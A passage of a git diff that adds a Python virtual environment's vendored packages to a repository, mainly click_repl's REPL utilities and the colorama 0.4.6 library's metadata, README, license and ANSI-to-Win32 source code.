CommandLineParserError(Exception): + pass + + +class InvalidGroupFormat(Exception): + pass + + +# Handle click.exceptions.Exit introduced in Click 7.0 +try: + from click.exceptions import Exit as ClickExit +except (ImportError, ModuleNotFoundError): + + class ClickExit(RuntimeError): # type: ignore[no-redef] + pass diff --git a/env/Lib/site-packages/click_repl/utils.py b/env/Lib/site-packages/click_repl/utils.py new file mode 100644 index 00000000..9aa98008 --- /dev/null +++ b/env/Lib/site-packages/click_repl/utils.py @@ -0,0 +1,222 @@ +import click +import os +import shlex +import sys +from collections import defaultdict + +from .exceptions import CommandLineParserError, ExitReplException + + +__all__ = [ + "_execute_internal_and_sys_cmds", + "_exit_internal", + "_get_registered_target", + "_help_internal", + "_resolve_context", + "_register_internal_command", + "dispatch_repl_commands", + "handle_internal_commands", + "split_arg_string", + "exit", +] + + +# Abstract datatypes in collections module are moved to collections.abc +# module in Python 3.3 +if sys.version_info >= (3, 3): + from collections.abc import Iterable, Mapping # noqa: F811 +else: + from collections import Iterable, Mapping + + +def _resolve_context(args, ctx=None): + """Produce the context hierarchy starting with the command and + traversing the complete arguments. This only follows the commands, + it doesn't trigger input prompts or callbacks. + + :param args: List of complete args before the incomplete value. + :param cli_ctx: `click.Context` object of the CLI group + """ + + while args: + command = ctx.command + + if isinstance(command, click.MultiCommand): + if not command.chain: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + ctx = cmd.make_context(name, args, parent=ctx, resilient_parsing=True) + args = ctx.protected_args + ctx.args + else: + while args: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + sub_ctx = cmd.make_context( + name, + args, + parent=ctx, + allow_extra_args=True, + allow_interspersed_args=False, + resilient_parsing=True, + ) + args = sub_ctx.args + + ctx = sub_ctx + args = [*sub_ctx.protected_args, *sub_ctx.args] + else: + break + + return ctx + + +_internal_commands = {} + + +def split_arg_string(string, posix=True): + """Split an argument string as with :func:`shlex.split`, but don't + fail if the string is incomplete. Ignores a missing closing quote or + incomplete escape sequence and uses the partial token as-is. + .. code-block:: python + split_arg_string("example 'my file") + ["example", "my file"] + split_arg_string("example my\\") + ["example", "my"] + :param string: String to split. + """ + + lex = shlex.shlex(string, posix=posix) + lex.whitespace_split = True + lex.commenters = "" + out = [] + + try: + for token in lex: + out.append(token) + except ValueError: + # Raised when end-of-string is reached in an invalid state. Use + # the partial token as-is. The quote or escape character is in + # lex.state, not lex.token. + out.append(lex.token) + + return out + + +def _register_internal_command(names, target, description=None): + if not hasattr(target, "__call__"): + raise ValueError("Internal command must be a callable") + + if isinstance(names, str): + names = [names] + + elif isinstance(names, Mapping) or not isinstance(names, Iterable): + raise ValueError( + '"names" must be a string, or an iterable object, but got "{}"'.format( + type(names).__name__ + ) + ) + + for name in names: + _internal_commands[name] = (target, description) + + +def _get_registered_target(name, default=None): + target_info = _internal_commands.get(name) + if target_info: + return target_info[0] + return default + + +def _exit_internal(): + raise ExitReplException() + + +def _help_internal(): + formatter = click.HelpFormatter() + formatter.write_heading("REPL help") + formatter.indent() + + with formatter.section("External Commands"): + formatter.write_text('prefix external commands with "!"') + + with formatter.section("Internal Commands"): + formatter.write_text('prefix internal commands with ":"') + info_table = defaultdict(list) + + for mnemonic, target_info in _internal_commands.items(): + info_table[target_info[1]].append(mnemonic) + + formatter.write_dl( # type: ignore[arg-type] + ( # type: ignore[arg-type] + ", ".join(map(":{}".format, sorted(mnemonics))), + description, + ) + for description, mnemonics in info_table.items() + ) + + val = formatter.getvalue() # type: str + return val + + +_register_internal_command(["q", "quit", "exit"], _exit_internal, "exits the repl") +_register_internal_command( + ["?", "h", "help"], _help_internal, "displays general help information" +) + + +def _execute_internal_and_sys_cmds( + command, + allow_internal_commands=True, + allow_system_commands=True, +): + """ + Executes internal, system, and all the other registered click commands from the input + """ + if allow_system_commands and dispatch_repl_commands(command): + return None + + if allow_internal_commands: + result = handle_internal_commands(command) + if isinstance(result, str): + click.echo(result) + return None + + try: + return split_arg_string(command) + except ValueError as e: + raise CommandLineParserError("{}".format(e)) + + +def exit(): + """Exit the repl""" + _exit_internal() + + +def dispatch_repl_commands(command): + """ + Execute system commands entered in the repl. + + System commands are all commands starting with "!". + """ + if command.startswith("!"): + os.system(command[1:]) + return True + + return False + + +def handle_internal_commands(command): + """ + Run repl-internal commands. + + Repl-internal commands are all commands starting with ":". + """ + if command.startswith(":"): + target = _get_registered_target(command[1:], default=None) + if target: + return target() diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/INSTALLER b/env/Lib/site-packages/colorama-0.4.6.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/METADATA b/env/Lib/site-packages/colorama-0.4.6.dist-info/METADATA new file mode 100644 index 00000000..a1b5c575 --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/METADATA @@ -0,0 +1,441 @@ +Metadata-Version: 2.1 +Name: colorama +Version: 0.4.6 +Summary: Cross-platform colored terminal text. +Project-URL: Homepage, https://github.com/tartley/colorama +Author-email: Jonathan Hartley +License-File: LICENSE.txt +Keywords: ansi,color,colour,crossplatform,terminal,text,windows,xplatform +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Console +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Terminals +Requires-Python: !=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7 +Description-Content-Type: text/x-rst + +.. image:: https://img.shields.io/pypi/v/colorama.svg + :target: https://pypi.org/project/colorama/ + :alt: Latest Version + +.. image:: https://img.shields.io/pypi/pyversions/colorama.svg + :target: https://pypi.org/project/colorama/ + :alt: Supported Python versions + +.. image:: https://github.com/tartley/colorama/actions/workflows/test.yml/badge.svg + :target: https://github.com/tartley/colorama/actions/workflows/test.yml + :alt: Build Status + +Colorama +======== + +Makes ANSI escape character sequences (for producing colored terminal text and +cursor positioning) work under MS Windows. + +.. |donate| image:: https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif + :target: https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=2MZ9D2GMLYCUJ&item_name=Colorama¤cy_code=USD + :alt: Donate with Paypal + +`PyPI for releases `_ | +`Github for source `_ | +`Colorama for enterprise on Tidelift `_ + +If you find Colorama useful, please |donate| to the authors. Thank you! + +Installation +------------ + +Tested on CPython 2.7, 3.7, 3.8, 3.9 and 3.10 and Pypy 2.7 and 3.8. + +No requirements other than the standard library. + +.. code-block:: bash + + pip install colorama + # or + conda install -c anaconda colorama + +Description +----------- + +ANSI escape character sequences have long been used to produce colored terminal +text and cursor positioning on Unix and Macs. Colorama makes this work on +Windows, too, by wrapping ``stdout``, stripping ANSI sequences it finds (which +would appear as gobbledygook in the output), and converting them into the +appropriate win32 calls to modify the state of the terminal. On other platforms, +Colorama does nothing. + +This has the upshot of providing a simple cross-platform API for printing +colored terminal text from Python, and has the happy side-effect that existing +applications or libraries which use ANSI sequences to produce colored output on +Linux or Macs can now also work on Windows, simply by calling +``colorama.just_fix_windows_console()`` (since v0.4.6) or ``colorama.init()`` +(all versions, but may have other side-effects – see below). + +An alternative approach is to install ``ansi.sys`` on Windows machines, which +provides the same behaviour for all applications running in terminals. Colorama +is intended for situations where that isn't easy (e.g., maybe your app doesn't +have an installer.) + +Demo scripts in the source code repository print some colored text using +ANSI sequences. Compare their output under Gnome-terminal's built in ANSI +handling, versus on Windows Command-Prompt using Colorama: + +.. image:: https://github.com/tartley/colorama/raw/master/screenshots/ubuntu-demo.png + :width: 661 + :height: 357 + :alt: ANSI sequences on Ubuntu under gnome-terminal. + +.. image:: https://github.com/tartley/colorama/raw/master/screenshots/windows-demo.png + :width: 668 + :height: 325 + :alt: Same ANSI sequences on Windows, using Colorama. + +These screenshots show that, on Windows, Colorama does not support ANSI 'dim +text'; it looks the same as 'normal text'. + +Usage +----- + +Initialisation +.............. + +If the only thing you want from Colorama is to get ANSI escapes to work on +Windows, then run: + +.. code-block:: python + + from colorama import just_fix_windows_console + just_fix_windows_console() + +If you're on a recent version of Windows 10 or better, and your stdout/stderr +are pointing to a Windows console, then this will flip the magic configuration +switch to enable Windows' built-in ANSI support. + +If you're on an older version of Windows, and your stdout/stderr are pointing to +a Windows console, then this will wrap ``sys.stdout`` and/or ``sys.stderr`` in a +magic file object that intercepts ANSI escape sequences and issues the +appropriate Win32 calls to emulate them. + +In all other circumstances, it does nothing whatsoever. Basically the idea is +that this makes Windows act like Unix with respect to ANSI escape handling. + +It's safe to call this function multiple times. It's safe to call this function +on non-Windows platforms, but it won't do anything. It's safe to call this +function when one or both of your stdout/stderr are redirected to a file – it +won't do anything to those streams. + +Alternatively, you can use the older interface with more features (but also more +potential footguns): + +.. code-block:: python + + from colorama import init + init() + +This does the same thing as ``just_fix_windows_console``, except for the +following differences: + +- It's not safe to call ``init`` multiple times; you can end up with multiple + layers of wrapping and broken ANSI support. + +- Colorama will apply a heuristic to guess whether stdout/stderr support ANSI, + and if it thinks they don't, then it will wrap ``sys.stdout`` and + ``sys.stderr`` in a magic file object that strips out ANSI escape sequences + before printing them. This happens on all platforms, and can be convenient if + you want to write your code to emit ANSI escape sequences unconditionally, and + let Colorama decide whether they should actually be output. But note that + Colorama's heuristic is not particularly clever. + +- ``init`` also accepts explicit keyword args to enable/disable various + functionality – see below. + +To stop using Colorama before your program exits, simply call ``deinit()``. +This will restore ``stdout`` and ``stderr`` to their original values, so that +Colorama is disabled. To resume using Colorama again, call ``reinit()``; it is +cheaper than calling ``init()`` again (but does the same thing). + +Most users should depend on ``colorama >= 0.4.6``, and use +``just_fix_windows_console``. The old ``init`` interface will be supported +indefinitely for backwards compatibility, but we don't plan to fix any issues +with it, also for backwards compatibility. + +Colored Output +.............. + +Cross-platform printing of colored text can then be done using Colorama's +constant shorthand for ANSI escape sequences. These are deliberately +rudimentary, see below. + +.. code-block:: python + + from colorama import Fore, Back, Style + print(Fore.RED + 'some red text') + print(Back.GREEN + 'and with a green background') + print(Style.DIM + 'and in dim text') + print(Style.RESET_ALL) + print('back to normal now') + +...or simply by manually printing ANSI sequences from your own code: + +.. code-block:: python + + print('\033[31m' + 'some red text') + print('\033[39m') # and reset to default color + +...or, Colorama can be used in conjunction with existing ANSI libraries +such as the venerable `Termcolor `_ +the fabulous `Blessings `_, +or the incredible `_Rich `_. + +If you wish Colorama's Fore, Back and Style constants were more capable, +then consider using one of the above highly capable libraries to generate +colors, etc, and use Colorama just for its primary purpose: to convert +those ANSI sequences to also work on Windows: + +SIMILARLY, do not send PRs adding the generation of new ANSI types to Colorama. +We are only interested in converting ANSI codes to win32 API calls, not +shortcuts like the above to generate ANSI characters. + +.. code-block:: python + + from colorama import just_fix_windows_console + from termcolor import colored + + # use Colorama to make Termcolor work on Windows too + just_fix_windows_console() + + # then use Termcolor for all colored text output + print(colored('Hello, World!', 'green', 'on_red')) + +Available formatting constants are:: + + Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET. + Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET. + Style: DIM, NORMAL, BRIGHT, RESET_ALL + +``Style.RESET_ALL`` resets foreground, background, and brightness. Colorama will +perform this reset automatically on program exit. + +These are fairly well supported, but not part of the standard:: + + Fore: LIGHTBLACK_EX, LIGHTRED_EX, LIGHTGREEN_EX, LIGHTYELLOW_EX, LIGHTBLUE_EX, LIGHTMAGENTA_EX, LIGHTCYAN_EX, LIGHTWHITE_EX + Back: LIGHTBLACK_EX, LIGHTRED_EX, LIGHTGREEN_EX, LIGHTYELLOW_EX, LIGHTBLUE_EX, LIGHTMAGENTA_EX, LIGHTCYAN_EX, LIGHTWHITE_EX + +Cursor Positioning +.................. + +ANSI codes to reposition the cursor are supported. See ``demos/demo06.py`` for +an example of how to generate them. + +Init Keyword Args +................. + +``init()`` accepts some ``**kwargs`` to override default behaviour. + +init(autoreset=False): + If you find yourself repeatedly sending reset sequences to turn off color + changes at the end of every print, then ``init(autoreset=True)`` will + automate that: + + .. code-block:: python + + from colorama import init + init(autoreset=True) + print(Fore.RED + 'some red text') + print('automatically back to default color again') + +init(strip=None): + Pass ``True`` or ``False`` to override whether ANSI codes should be + stripped from the output. The default behaviour is to strip if on Windows + or if output is redirected (not a tty). + +init(convert=None): + Pass ``True`` or ``False`` to override whether to convert ANSI codes in the + output into win32 calls. The default behaviour is to convert if on Windows + and output is to a tty (terminal). + +init(wrap=True): + On Windows, Colorama works by replacing ``sys.stdout`` and ``sys.stderr`` + with proxy objects, which override the ``.write()`` method to do their work. + If this wrapping causes you problems, then this can be disabled by passing + ``init(wrap=False)``. The default behaviour is to wrap if ``autoreset`` or + ``strip`` or ``convert`` are True. + + When wrapping is disabled, colored printing on non-Windows platforms will + continue to work as normal. To do cross-platform colored output, you can + use Colorama's ``AnsiToWin32`` proxy directly: + + .. code-block:: python + + import sys + from colorama import init, AnsiToWin32 + init(wrap=False) + stream = AnsiToWin32(sys.stderr).stream + + # Python 2 + print >>stream, Fore.BLUE + 'blue text on stderr' + + # Python 3 + print(Fore.BLUE + 'blue text on stderr', file=stream) + +Recognised ANSI Sequences +......................... + +ANSI sequences generally take the form:: + + ESC [ ; ... + +Where ```` is an integer, and ```` is a single letter. Zero or +more params are passed to a ````. If no params are passed, it is +generally synonymous with passing a single zero. No spaces exist in the +sequence; they have been inserted here simply to read more easily. + +The only ANSI sequences that Colorama converts into win32 calls are:: + + ESC [ 0 m # reset all (colors and brightness) + ESC [ 1 m # bright + ESC [ 2 m # dim (looks same as normal brightness) + ESC [ 22 m # normal brightness + + # FOREGROUND: + ESC [ 30 m # black + ESC [ 31 m # red + ESC [ 32 m # green + ESC [ 33 m # yellow + ESC [ 34 m # blue + ESC [ 35 m # magenta + ESC [ 36 m # cyan + ESC [ 37 m # white + ESC [ 39 m # reset + + # BACKGROUND + ESC [ 40 m # black + ESC [ 41 m # red + ESC [ 42 m # green + ESC [ 43 m # yellow + ESC [ 44 m # blue + ESC [ 45 m # magenta + ESC [ 46 m # cyan + ESC [ 47 m # white + ESC [ 49 m # reset + + # cursor positioning + ESC [ y;x H # position cursor at x across, y down + ESC [ y;x f # position cursor at x across, y down + ESC [ n A # move cursor n lines up + ESC [ n B # move cursor n lines down + ESC [ n C # move cursor n characters forward + ESC [ n D # move cursor n characters backward + + # clear the screen + ESC [ mode J # clear the screen + + # clear the line + ESC [ mode K # clear the line + +Multiple numeric params to the ``'m'`` command can be combined into a single +sequence:: + + ESC [ 36 ; 45 ; 1 m # bright cyan text on magenta background + +All other ANSI sequences of the form ``ESC [ ; ... `` +are silently stripped from the output on Windows. + +Any other form of ANSI sequence, such as single-character codes or alternative +initial characters, are not recognised or stripped. It would be cool to add +them though. Let me know if it would be useful for you, via the Issues on +GitHub. + +Status & Known Problems +----------------------- + +I've personally only tested it on Windows XP (CMD, Console2), Ubuntu +(gnome-terminal, xterm), and OS X. + +Some valid ANSI sequences aren't recognised. + +If you're hacking on the code, see `README-hacking.md`_. ESPECIALLY, see the +explanation there of why we do not want PRs that allow Colorama to generate new +types of ANSI codes. + +See outstanding issues and wish-list: +https://github.com/tartley/colorama/issues + +If anything doesn't work for you, or doesn't do what you expected or hoped for, +I'd love to hear about it on that issues list, would be delighted by patches, +and would be happy to grant commit access to anyone who submits a working patch +or two. + +.. _README-hacking.md: README-hacking.md + +License +------- + +Copyright Jonathan Hartley & Arnon Yaari, 2013-2020. BSD 3-Clause license; see +LICENSE file. + +Professional support +-------------------- + +.. |tideliftlogo| image:: https://cdn2.hubspot.net/hubfs/4008838/website/logos/logos_for_download/Tidelift_primary-shorthand-logo.png + :alt: Tidelift + :target: https://tidelift.com/subscription/pkg/pypi-colorama?utm_source=pypi-colorama&utm_medium=referral&utm_campaign=readme + +.. list-table:: + :widths: 10 100 + + * - |tideliftlogo| + - Professional support for colorama is available as part of the + `Tidelift Subscription`_. + Tidelift gives software development teams a single source for purchasing + and maintaining their software, with professional grade assurances from + the experts who know it best, while seamlessly integrating with existing + tools. + +.. _Tidelift Subscription: https://tidelift.com/subscription/pkg/pypi-colorama?utm_source=pypi-colorama&utm_medium=referral&utm_campaign=readme + +Thanks +------ + +See the CHANGELOG for more thanks! + +* Marc Schlaich (schlamar) for a ``setup.py`` fix for Python2.5. +* Marc Abramowitz, reported & fixed a crash on exit with closed ``stdout``, + providing a solution to issue #7's setuptools/distutils debate, + and other fixes. +* User 'eryksun', for guidance on correctly instantiating ``ctypes.windll``. +* Matthew McCormick for politely pointing out a longstanding crash on non-Win. +* Ben Hoyt, for a magnificent fix under 64-bit Windows. +* Jesse at Empty Square for submitting a fix for examples in the README. +* User 'jamessp', an observant documentation fix for cursor positioning. +* User 'vaal1239', Dave Mckee & Lackner Kristof for a tiny but much-needed Win7 + fix. +* Julien Stuyck, for wisely suggesting Python3 compatible updates to README. +* Daniel Griffith for multiple fabulous patches. +* Oscar Lesta for a valuable fix to stop ANSI chars being sent to non-tty + output. +* Roger Binns, for many suggestions, valuable feedback, & bug reports. +* Tim Golden for thought and much appreciated feedback on the initial idea. +* User 'Zearin' for updates to the README file. +* John Szakmeister for adding support for light colors +* Charles Merriam for adding documentation to demos +* Jurko for a fix on 64-bit Windows CPython2.5 w/o ctypes +* Florian Bruhin for a fix when stdout or stderr are None +* Thomas Weininger for fixing ValueError on Windows +* Remi Rampin for better Github integration and fixes to the README file +* Simeon Visser for closing a file handle using 'with' and updating classifiers + to include Python 3.3 and 3.4 +* Andy Neff for fixing RESET of LIGHT_EX colors. +* Jonathan Hartley for the initial idea and implementation. diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/RECORD b/env/Lib/site-packages/colorama-0.4.6.dist-info/RECORD new file mode 100644 index 00000000..8c5f12de --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/RECORD @@ -0,0 +1,31 @@ +colorama-0.4.6.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +colorama-0.4.6.dist-info/METADATA,sha256=e67SnrUMOym9sz_4TjF3vxvAV4T3aF7NyqRHHH3YEMw,17158 +colorama-0.4.6.dist-info/RECORD,, +colorama-0.4.6.dist-info/WHEEL,sha256=cdcF4Fbd0FPtw2EMIOwH-3rSOTUdTCeOSXRMD1iLUb8,105 +colorama-0.4.6.dist-info/licenses/LICENSE.txt,sha256=ysNcAmhuXQSlpxQL-zs25zrtSWZW6JEQLkKIhteTAxg,1491 +colorama/__init__.py,sha256=wePQA4U20tKgYARySLEC047ucNX-g8pRLpYBuiHlLb8,266 +colorama/__pycache__/__init__.cpython-310.pyc,, +colorama/__pycache__/ansi.cpython-310.pyc,, +colorama/__pycache__/ansitowin32.cpython-310.pyc,, +colorama/__pycache__/initialise.cpython-310.pyc,, +colorama/__pycache__/win32.cpython-310.pyc,, +colorama/__pycache__/winterm.cpython-310.pyc,, +colorama/ansi.py,sha256=Top4EeEuaQdBWdteKMEcGOTeKeF19Q-Wo_6_Cj5kOzQ,2522 +colorama/ansitowin32.py,sha256=vPNYa3OZbxjbuFyaVo0Tmhmy1FZ1lKMWCnT7odXpItk,11128 +colorama/initialise.py,sha256=-hIny86ClXo39ixh5iSCfUIa2f_h_bgKRDW7gqs-KLU,3325 +colorama/tests/__init__.py,sha256=MkgPAEzGQd-Rq0w0PZXSX2LadRWhUECcisJY8lSrm4Q,75 +colorama/tests/__pycache__/__init__.cpython-310.pyc,, +colorama/tests/__pycache__/ansi_test.cpython-310.pyc,, +colorama/tests/__pycache__/ansitowin32_test.cpython-310.pyc,, +colorama/tests/__pycache__/initialise_test.cpython-310.pyc,, +colorama/tests/__pycache__/isatty_test.cpython-310.pyc,, +colorama/tests/__pycache__/utils.cpython-310.pyc,, +colorama/tests/__pycache__/winterm_test.cpython-310.pyc,, +colorama/tests/ansi_test.py,sha256=FeViDrUINIZcr505PAxvU4AjXz1asEiALs9GXMhwRaE,2839 +colorama/tests/ansitowin32_test.py,sha256=RN7AIhMJ5EqDsYaCjVo-o4u8JzDD4ukJbmevWKS70rY,10678 +colorama/tests/initialise_test.py,sha256=BbPy-XfyHwJ6zKozuQOvNvQZzsx9vdb_0bYXn7hsBTc,6741 +colorama/tests/isatty_test.py,sha256=Pg26LRpv0yQDB5Ac-sxgVXG7hsA1NYvapFgApZfYzZg,1866 +colorama/tests/utils.py,sha256=1IIRylG39z5-dzq09R_ngufxyPZxgldNbrxKxUGwGKE,1079 +colorama/tests/winterm_test.py,sha256=qoWFPEjym5gm2RuMwpf3pOis3a5r_PJZFCzK254JL8A,3709 +colorama/win32.py,sha256=YQOKwMTwtGBbsY4dL5HYTvwTeP9wIQra5MvPNddpxZs,6181 +colorama/winterm.py,sha256=XCQFDHjPi6AHYNdZwy0tA02H-Jh48Jp-HvCjeLeLp3U,7134 diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/WHEEL b/env/Lib/site-packages/colorama-0.4.6.dist-info/WHEEL new file mode 100644 index 00000000..d79189fd --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: hatchling 1.11.1 +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/licenses/LICENSE.txt b/env/Lib/site-packages/colorama-0.4.6.dist-info/licenses/LICENSE.txt new file mode 100644 index 00000000..3105888e --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/licenses/LICENSE.txt @@ -0,0 +1,27 @@ +Copyright (c) 2010 Jonathan Hartley +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +* Neither the name of the copyright holders, nor those of its contributors + may be used to endorse or promote products derived from this software without + specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/colorama/__init__.py b/env/Lib/site-packages/colorama/__init__.py new file mode 100644 index 00000000..383101cd --- /dev/null +++ b/env/Lib/site-packages/colorama/__init__.py @@ -0,0 +1,7 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from .initialise import init, deinit, reinit, colorama_text, just_fix_windows_console +from .ansi import Fore, Back, Style, Cursor +from .ansitowin32 import AnsiToWin32 + +__version__ = '0.4.6' + diff --git a/env/Lib/site-packages/colorama/ansi.py b/env/Lib/site-packages/colorama/ansi.py new file mode 100644 index 00000000..11ec695f --- /dev/null +++ b/env/Lib/site-packages/colorama/ansi.py @@ -0,0 +1,102 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +''' +This module generates ANSI character codes to printing colors to terminals. +See: http://en.wikipedia.org/wiki/ANSI_escape_code +''' + +CSI = '\033[' +OSC = '\033]' +BEL = '\a' + + +def code_to_chars(code): + return CSI + str(code) + 'm' + +def set_title(title): + return OSC + '2;' + title + BEL + +def clear_screen(mode=2): + return CSI + str(mode) + 'J' + +def clear_line(mode=2): + return CSI + str(mode) + 'K' + + +class AnsiCodes(object): + def __init__(self): + # the subclasses declare class attributes which are numbers. + # Upon instantiation we define instance attributes, which are the same + # as the class attributes but wrapped with the ANSI escape sequence + for name in dir(self): + if not name.startswith('_'): + value = getattr(self, name) + setattr(self, name, code_to_chars(value)) + + +class AnsiCursor(object): + def UP(self, n=1): + return CSI + str(n) + 'A' + def DOWN(self, n=1): + return CSI + str(n) + 'B' + def FORWARD(self, n=1): + return CSI + str(n) + 'C' + def BACK(self, n=1): + return CSI + str(n) + 'D' + def POS(self, x=1, y=1): + return CSI + str(y) + ';' + str(x) + 'H' + + +class AnsiFore(AnsiCodes): + BLACK = 30 + RED = 31 + GREEN = 32 + YELLOW = 33 + BLUE = 34 + MAGENTA = 35 + CYAN = 36 + WHITE = 37 + RESET = 39 + + # These are fairly well supported, but not part of the standard. + LIGHTBLACK_EX = 90 + LIGHTRED_EX = 91 + LIGHTGREEN_EX = 92 + LIGHTYELLOW_EX = 93 + LIGHTBLUE_EX = 94 + LIGHTMAGENTA_EX = 95 + LIGHTCYAN_EX = 96 + LIGHTWHITE_EX = 97 + + +class AnsiBack(AnsiCodes): + BLACK = 40 + RED = 41 + GREEN = 42 + YELLOW = 43 + BLUE = 44 + MAGENTA = 45 + CYAN = 46 + WHITE = 47 + RESET = 49 + + # These are fairly well supported, but not part of the standard. + LIGHTBLACK_EX = 100 + LIGHTRED_EX = 101 + LIGHTGREEN_EX = 102 + LIGHTYELLOW_EX = 103 + LIGHTBLUE_EX = 104 + LIGHTMAGENTA_EX = 105 + LIGHTCYAN_EX = 106 + LIGHTWHITE_EX = 107 + + +class AnsiStyle(AnsiCodes): + BRIGHT = 1 + DIM = 2 + NORMAL = 22 + RESET_ALL = 0 + +Fore = AnsiFore() +Back = AnsiBack() +Style = AnsiStyle() +Cursor = AnsiCursor() diff --git a/env/Lib/site-packages/colorama/ansitowin32.py b/env/Lib/site-packages/colorama/ansitowin32.py new file mode 100644 index 00000000..abf209e6 --- /dev/null +++ b/env/Lib/site-packages/colorama/ansitowin32.py @@ -0,0 +1,277 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import re +import sys +import os + +from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style, BEL +from .winterm import enable_vt_processing, WinTerm, WinColor, WinStyle +from .win32 import windll, winapi_test + + +winterm = None +if windll is not None: + winterm = WinTerm() + + +class StreamWrapper(object): + ''' + Wraps a stream (such as stdout), acting as a transparent proxy for all + attribute access apart from method 'write()', which is delegated to our + Converter instance. + ''' + def __init__(self, wrapped, converter): + # double-underscore everything to prevent clashes with names of + # attributes on the wrapped stream object. + self.__wrapped = wrapped + self.__convertor = converter + + def __getattr__(self, name): + return getattr(self.__wrapped, name) + + def __enter__(self, *args, **kwargs): + # special method lookup bypasses __getattr__/__getattribute__, see + # https://stackoverflow.com/questions/12632894/why-doesnt-getattr-work-with-exit + # thus, contextlib magic methods are not proxied via __getattr__ + return self.__wrapped.__enter__(*args, **kwargs) + + def __exit__(self, *args, **kwargs): + return self.__wrapped.__exit__(*args, **kwargs) + + def __setstate__(self, state): + self.__dict__ = state + + def __getstate__(self): + return self.__dict__ + + def write(self, text): + self.__convertor.write(text) + + def isatty(self): + stream = self.__wrapped + if 'PYCHARM_HOSTED' in os.environ: + if stream is not None and (stream is sys.__stdout__ or stream is sys.__stderr__): + return True + try: + stream_isatty = stream.isatty + except AttributeError: + return False + else: + return stream_isatty() + + @property + def closed(self): + stream = self.__wrapped + try: + return stream.closed + # AttributeError in the case that the stream doesn't support being closed + # ValueError for the case that the stream has already been detached when atexit runs + except (AttributeError, ValueError): + return True + + +class AnsiToWin32(object): + ''' + Implements a 'write()' method which, on Windows, will strip ANSI character + sequences from the text, and if outputting to a tty, will convert them into + win32 function calls. + ''' + ANSI_CSI_RE = re.compile('\001?\033\\[((?:\\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer + ANSI_OSC_RE = re.compile('\001?\033\\]([^\a]*)(\a)\002?') # Operating System Command + + def __init__(self, wrapped, convert=None, strip=None, autoreset=False): + # The wrapped stream (normally sys.stdout or sys.stderr) + self.wrapped = wrapped + + # should we reset colors to defaults after every .write() + self.autoreset = autoreset + + # create the proxy wrapping our output stream + self.stream = StreamWrapper(wrapped, self) + + on_windows = os.name == 'nt' + # We test if the WinAPI works, because even if we are on Windows + # we may be using a terminal that doesn't support the WinAPI + # (e.g. Cygwin Terminal). In this case it's up to the terminal + # to support the ANSI codes. + conversion_supported = on_windows and winapi_test() + try: + fd = wrapped.fileno() + except Exception: + fd = -1 + system_has_native_ansi = not on_windows or enable_vt_processing(fd) + have_tty = not self.stream.closed and self.stream.isatty() + need_conversion = conversion_supported and not system_has_native_ansi + + # should we strip ANSI sequences from our output? + if strip is None: + strip = 